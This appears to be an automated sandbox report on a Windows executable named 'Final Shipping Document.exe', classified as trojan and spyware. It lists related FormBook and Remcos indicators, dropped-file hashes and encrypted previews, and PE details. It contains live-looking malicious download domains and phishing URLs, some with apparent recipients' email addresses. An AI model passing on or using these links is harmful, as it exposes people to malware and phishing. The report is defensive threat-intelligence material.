                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Final Shipping Document.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@13/8
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 52
                                            • Number of non-executed functions: 290
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target QnAcfZuONg.exe, PID 7100 because it is empty
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: Final Shipping Document.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:46:12API Interceptor6480039x Sleep call for process: gpupdate.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            178.212.35.248New Order#9.exeGet hashmaliciousFormBookBrowse
                                              PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                OaHosly9lyzkZ0G.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  afn6Od8oV1sUzD6.exeGet hashmaliciousFormBookBrowse
                                                    HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                                                      j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                                        DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                                                          104.21.59.240PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • www.pqnqxn.xyz/fku9/
                                                          OaHosly9lyzkZ0G.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.pqnqxn.xyz/fku9/
                                                          afn6Od8oV1sUzD6.exeGet hashmaliciousFormBookBrowse
                                                          • www.pqnqxn.xyz/fku9/
                                                          j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                                          • www.pqnqxn.xyz/fku9/
                                                          DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                                                          • www.pqnqxn.xyz/fku9/
                                                          188.114.96.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • tny.wtf/
                                                          DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                          • tny.wtf/dg4Zx
                                                          Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                          • tny.wtf/c8lH8
                                                          AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                          • tny.wtf/sA
                                                          waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • hq.ax/Oi8
                                                          RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • tny.wtf/dGa
                                                          RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • tny.wtf/
                                                          Quotation.xlsGet hashmaliciousRemcosBrowse
                                                          • tny.wtf/jjJsPX
                                                          xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                                                          • api.keyunet.cn/v3/Project/appInfo/65fc6006
                                                          LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.gridban.xyzNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 162.254.38.56
                                                          www.pqnqxn.xyzNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.185.114
                                                          PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.59.240
                                                          DOC 0201_360737031.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.59.240
                                                          Remittance advice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 172.67.185.114
                                                          INV90097.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.185.114
                                                          OaHosly9lyzkZ0G.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 104.21.59.240
                                                          afn6Od8oV1sUzD6.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.59.240
                                                          HSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                                                          • 172.67.185.114
                                                          j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.59.240
                                                          DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                                                          • 104.21.59.240
                                                          8fyhback.javalebogame008.comNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 154.218.3.243
                                                          Eugg3yid0O.exeGet hashmaliciousFormBookBrowse
                                                          • 45.207.4.217
                                                          www.artfulfusionhub.latHSOwUsZ7hs6Pm4m.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          j2vPH4wfF2YxEja.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.97.3
                                                          DY3AojqquRfcmp5.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          NTT-LT-ASLTNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                                                          • 84.32.84.19
                                                          OPEN BALANCE.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.65
                                                          COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0Get hashmaliciousUnknownBrowse
                                                          • 84.32.84.212
                                                          http://www.cabrerallamas.com/Get hashmaliciousUnknownBrowse
                                                          • 84.32.84.136
                                                          LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 84.32.84.225
                                                          LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.102
                                                          PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                                                          • 84.32.84.139
                                                          CLOUDFLARENETUShttps://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                                                          • 104.17.25.14
                                                          https://123formbuilder.info/wj412l/#9ryano@vib.techGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                          • 104.21.72.79
                                                          file.exeGet hashmaliciousBabadeda, Coinhive, XmrigBrowse
                                                          • 172.64.41.3
                                                          https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0Get hashmaliciousPhisherBrowse
                                                          • 104.21.52.77
                                                          file.exeGet hashmaliciousBabadedaBrowse
                                                          • 172.64.41.3
                                                          FW_ Data Sync Completed Successfully - #BWYEIQF_.emlGet hashmaliciousUnknownBrowse
                                                          • 104.21.10.30
                                                          https://forms.office.com/e/4PVhav2XCGGet hashmaliciousUnknownBrowse
                                                          • 104.16.117.116
                                                          AKPSrAWl2G.elfGet hashmaliciousMiraiBrowse
                                                          • 1.8.62.115
                                                          https://pe-encrypt.statefarm.com/formpostdir/securereader?id=Lpcn7iyYhE0u8Rg0xxSBcOU-9IPSMsmm&brand=3993e80ababa08f55Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          BILLY-AS-APAntboxNetworkCNNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 154.218.3.243
                                                          https://bet958z.com/Get hashmaliciousUnknownBrowse
                                                          • 185.121.169.26
                                                          https://7365bb.vip/Get hashmaliciousUnknownBrowse
                                                          • 185.121.169.26
                                                          http://18255.comGet hashmaliciousUnknownBrowse
                                                          • 156.227.29.156
                                                          INVOICE_PO.exeGet hashmaliciousFormBookBrowse
                                                          • 103.68.111.168
                                                          FhmDxxpEZM.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          FfpHp8F4pY.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          ungziped_file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 103.68.111.168
                                                          PAYMENT_DETAILS.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                          • 156.227.28.51
                                                          piyMkUBOS9.exeGet hashmaliciousFormBookBrowse
                                                          • 156.227.28.33
                                                          DEDIPATH-LLCUSNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          LisectAVT_2403002C_83.exeGet hashmaliciousRedLineBrowse
                                                          • 45.9.20.20
                                                          PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          4qOdQ3lrYx.elfGet hashmaliciousMiraiBrowse
                                                          • 45.12.141.80
                                                          Update.jsGet hashmaliciousSocGholishBrowse
                                                          • 45.83.31.54
                                                          OaHosly9lyzkZ0G.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 178.212.35.248
                                                          https://itaconsorciodigital.com.br/termosdeusoGet hashmaliciousUnknownBrowse
                                                          • 149.62.37.231
                                                          afn6Od8oV1sUzD6.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.248
                                                          swift copy.exeGet hashmaliciousFormBookBrowse
                                                          • 178.212.35.176
                                                          001.jarGet hashmaliciousUnknownBrowse
                                                          • 185.255.114.18
                                                          CLOUDFLARENETUShttps://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                                                          • 104.17.25.14
                                                          https://123formbuilder.info/wj412l/#9ryano@vib.techGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                          • 104.21.72.79
                                                          file.exeGet hashmaliciousBabadeda, Coinhive, XmrigBrowse
                                                          • 172.64.41.3
                                                          https://storage.googleapis.com/3ee33d379fb68c2e6e88/3633420a894acb1dc7559f656#cl/0_smt/10/3617893/3293/0/0Get hashmaliciousPhisherBrowse
                                                          • 104.21.52.77
                                                          file.exeGet hashmaliciousBabadedaBrowse
                                                          • 172.64.41.3
                                                          FW_ Data Sync Completed Successfully - #BWYEIQF_.emlGet hashmaliciousUnknownBrowse
                                                          • 104.21.10.30
                                                          https://forms.office.com/e/4PVhav2XCGGet hashmaliciousUnknownBrowse
                                                          • 104.16.117.116
                                                          AKPSrAWl2G.elfGet hashmaliciousMiraiBrowse
                                                          • 1.8.62.115
                                                          https://pe-encrypt.statefarm.com/formpostdir/securereader?id=Lpcn7iyYhE0u8Rg0xxSBcOU-9IPSMsmm&brand=3993e80ababa08f55Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\303e-83

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\gpupdate.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\autEBF.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):286720
                                                          Entropy (8bit):7.995387814214577
                                                          Encrypted:true
                                                          SSDEEP:6144:UR75V/AQ3ehrFlMbqcLgSGeGVDiPycUmuekIQ07hd6U:G3AQWMbqc0SGe4DgUmuek6dn
                                                          MD5:D20F10A61FA6A5BD26397F310E4A91AB
                                                          SHA1:D353BCBC9D7438045952D88DAB362D1E731C1767
                                                          SHA-256:F023B648CD6A7971D6E0E5F92BB827D24A1F33B76D9908E28D33DB0326392296
                                                          SHA-512:56C5BB63AB804DAB0CBD6BCC1CEF34CB43361330EF292D779C63699C02FAA9A74CA08D2108CC8607A5EF81658C72CDA6A3CAC808DD6FE57927F0008C3BE72448
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:~.u..6LKP...=...h.LH....3J..AO6LKPQJ14FYBUT7LKAV800B3L0AO6.KPQD..HY.\...J...dX+@l@3 Q>*=q)PZ(66u6Rl948.Y^bw.ca"Y(.~\G;.FYBUT7L2@_..P%.qP&..,,.K..|9%.N..}6_.*..!(.."39wQS.YBUT7LKA.}00.2M07@Z.KPQJ14FY.UV6GJJV8~4B3L0AO6LK@EJ14VYBU43LKA.80 B3L2AO0LKPQJ14@YBUT7LKA6<00@3L0AO6NK..J1$FYRUT7L[AV(00B3L0QO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B.8U9;6LK..N14VYBU.3LKQV800B3L0AO6LKPqJ1TFYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3

                                                          C:\Users\user\AppData\Local\Temp\autF0E.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9768
                                                          Entropy (8bit):7.6308607833614435
                                                          Encrypted:false
                                                          SSDEEP:192:ZueSuy+g4uD+XOz0IkN35UQ6yU8ZI2qSaaYpkTKoF7Xb6Z:Zwb1+XhH351RU3BSa/pk1Y
                                                          MD5:54BCFB2F327E273114E428D10F2DCC5E
                                                          SHA1:9674DE209DC64240ECD5D03CB1843BBD13D78614
                                                          SHA-256:E65A9E1DA14F4F010D6AC31192FDBA537BBD0F9097CDE4D6E9BBA096D0DF03E3
                                                          SHA-512:AD08980B0460837915B4F3675DE6373B40C6289E3121C8DB405D30F364DBEB55A6FBC68E3C6087E58A4C6DA8ACF2BEBE77886858C7B718323AAE628031D36906
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

                                                          C:\Users\user\AppData\Local\Temp\batchers

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:ASCII text, with very long lines (28674), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28674
                                                          Entropy (8bit):3.581720989903068
                                                          Encrypted:false
                                                          SSDEEP:768:Jx6TBScFCo3T3iCev73GntQUA+n++nmkE/ns62HzimL5sCWC:yTBScFCo3T3iPv73GntQUA+n++nmkE/I
                                                          MD5:4BF4F511BB2255763F52BF28E374F9F4
                                                          SHA1:6E620DF306D31E6FDA33FCC83ECF04885B2596F3
                                                          SHA-256:586F570E53668E3AEC1D9E01AAA5B77DE348F3DDACBE54D5C06DA1A4ABBC4052
                                                          SHA-512:7F368B5E6A80E8948C996BC7B57E3F7EB1B47853E12429B944F19406256B4CFC5D3F43D46ECF2D775A88FD3CC1D9E3F4A4831E7953AEE3FD469861F81D0368BC
                                                          Malicious:false
                                                          Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

                                                          C:\Users\user\AppData\Local\Temp\buncal

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Final Shipping Document.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):286720
                                                          Entropy (8bit):7.995387814214577
                                                          Encrypted:true
                                                          SSDEEP:6144:UR75V/AQ3ehrFlMbqcLgSGeGVDiPycUmuekIQ07hd6U:G3AQWMbqc0SGe4DgUmuek6dn
                                                          MD5:D20F10A61FA6A5BD26397F310E4A91AB
                                                          SHA1:D353BCBC9D7438045952D88DAB362D1E731C1767
                                                          SHA-256:F023B648CD6A7971D6E0E5F92BB827D24A1F33B76D9908E28D33DB0326392296
                                                          SHA-512:56C5BB63AB804DAB0CBD6BCC1CEF34CB43361330EF292D779C63699C02FAA9A74CA08D2108CC8607A5EF81658C72CDA6A3CAC808DD6FE57927F0008C3BE72448
                                                          Malicious:false
                                                          Preview:~.u..6LKP...=...h.LH....3J..AO6LKPQJ14FYBUT7LKAV800B3L0AO6.KPQD..HY.\...J...dX+@l@3 Q>*=q)PZ(66u6Rl948.Y^bw.ca"Y(.~\G;.FYBUT7L2@_..P%.qP&..,,.K..|9%.N..}6_.*..!(.."39wQS.YBUT7LKA.}00.2M07@Z.KPQJ14FY.UV6GJJV8~4B3L0AO6LK@EJ14VYBU43LKA.80 B3L2AO0LKPQJ14@YBUT7LKA6<00@3L0AO6NK..J1$FYRUT7L[AV(00B3L0QO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B.8U9;6LK..N14VYBU.3LKQV800B3L0AO6LKPqJ1TFYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3L0AO6LKPQJ14FYBUT7LKAV800B3

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.107057243739191
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:Final Shipping Document.exe
                                                          File size:1'225'216 bytes
                                                          MD5:2d3ecaf3008e1d47782f668f713b35b1
                                                          SHA1:35ea8d6a9836384c69829e1a87ddb08c1f647fc7
                                                          SHA256:c2c3f4d25be2c10f834a4804172d58ee35adc35accd66227d7d89d9ae978e04d
                                                          SHA512:244d36e73d7209bfd82e96d55a24956e88c73d9af96957053c5bef7e78b0cf4b4a4364eb7664ef165a4761f26bad61c05385076a10515fa8ac9eb2982104dc93
                                                          SSDEEP:24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8aCMJb4CmSzh0u:CTvC/MTQYxsWR7aC8bsQu
                                                          TLSH:ED45CF0273D1C022FF9B92734F5AF6515ABC69260123E62F13A81D79BE701B1563E7A3
                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                          File Icon

                                                          Icon Hash:aaf3e3e3938382a0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x420577
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66A02797 [Tue Jul 23 21:58:47 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:948cc502fe9226992dce9417f952fce3

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FB28D588393h
                                                          jmp 00007FB28D587C9Fh
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FB28D587E7Dh
                                                          mov dword ptr [esi], 0049FDF0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                          mov dword ptr [ecx], 0049FDF0h
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FB28D587E4Ah
                                                          mov dword ptr [esi], 0049FE0Ch
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                          mov dword ptr [ecx], 0049FE0Ch
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 0049FDD0h
                                                          and dword ptr [eax], 00000000h
                                                          and dword ptr [eax+04h], 00000000h
                                                          push eax
                                                          mov eax, dword ptr [ebp+08h]
                                                          add eax, 04h
                                                          push eax
                                                          call 00007FB28D58AA3Dh
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          lea eax, dword ptr [ecx+04h]
                                                          mov dword ptr [ecx], 0049FDD0h
                                                          push eax
                                                          call 00007FB28D58AA88h
                                                          pop ecx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 0049FDD0h
                                                          push eax
                                                          call 00007FB28D58AA71h
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x547fc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1290000x7594.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
